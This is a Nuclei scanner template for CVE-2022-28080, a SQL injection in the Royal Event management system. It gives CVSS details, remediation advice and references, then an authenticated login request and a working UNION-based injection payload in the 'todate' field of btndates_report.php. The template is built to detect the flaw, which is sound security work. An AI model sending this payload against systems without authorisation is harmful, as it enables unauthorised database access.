id: CVE-2022-28080

info:
  name: Royal Event - SQL Injection
  author: lucasljm2001,ekrause,ritikchaddha
  severity: high
  description: |
    Royal Event is vulnerable to a SQL injection vulnerability.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire database.
  remediation: |
    To remediate this vulnerability, input validation and parameterized queries should be implemented to prevent SQL Injection attacks.
  reference:
    - https://www.exploit-db.com/exploits/50934
    - https://www.sourcecodester.com/sites/default/files/download/oretnom23/Royal%20Event.zip
    - https://github.com/erengozaydin/Royal-Event-Management-System-todate-SQL-Injection-Authenticated
    - https://nvd.nist.gov/vuln/detail/CVE-2022-28080
    - https://www.sourcecodester.com/php/15238/event-management-system-project-php-source-code.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2022-28080
    cwe-id: CWE-89
    epss-score: 0.01461
    epss-percentile: 0.86424
    cpe: cpe:2.3:a:event_management_system_project:event_management_system:1.0:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: event_management_system_project
    product: event_management_system
  tags: cve,cve2022,royalevent,edb,sqli,authenticated,cms,intrusive,event_management_system_project

http:
  - raw:
      - |
        POST /royal_event/ HTTP/1.1
        Host: {{Hostname}}
        Content-Length: 353
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCSxQll1eihcqgIgD

        ------WebKitFormBoundaryCSxQll1eihcqgIgD
        Content-Disposition: form-data; name="username"

        {{username}}
        ------WebKitFormBoundaryCSxQll1eihcqgIgD
        Content-Disposition: form-data; name="password"

        {{password}}
        ------WebKitFormBoundaryCSxQll1eihcqgIgD
        Content-Disposition: form-data; name="login"


        ------WebKitFormBoundaryCSxQll1eihcqgIgD--
      - |
        POST /royal_event/btndates_report.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFboH5ITu7DsGIGrD

        ------WebKitFormBoundaryFboH5ITu7DsGIGrD
        Content-Disposition: form-data; name="todate"

        1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5("{{randstr}}"),0x1,0x2),NULL-- -
        ------WebKitFormBoundaryFboH5ITu7DsGIGrD
        Content-Disposition: form-data; name="search"

        3
        ------WebKitFormBoundaryFboH5ITu7DsGIGrD
        Content-Disposition: form-data; name="fromdate"

        01/01/2011
        ------WebKitFormBoundaryFboH5ITu7DsGIGrD--

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '{{md5("{{randstr}}")}}'

      - type: status
        status:
          - 200
# digest: 490a0046304402206f49180b6302f9fef0412af1682487a99e8e841803be35372ea552f7878da30e022034287c08d99ef3e984b6ba91845fc4b18462d620c01f5ea9326718da215d237f:922c64590222798bb761d5b6d8e72950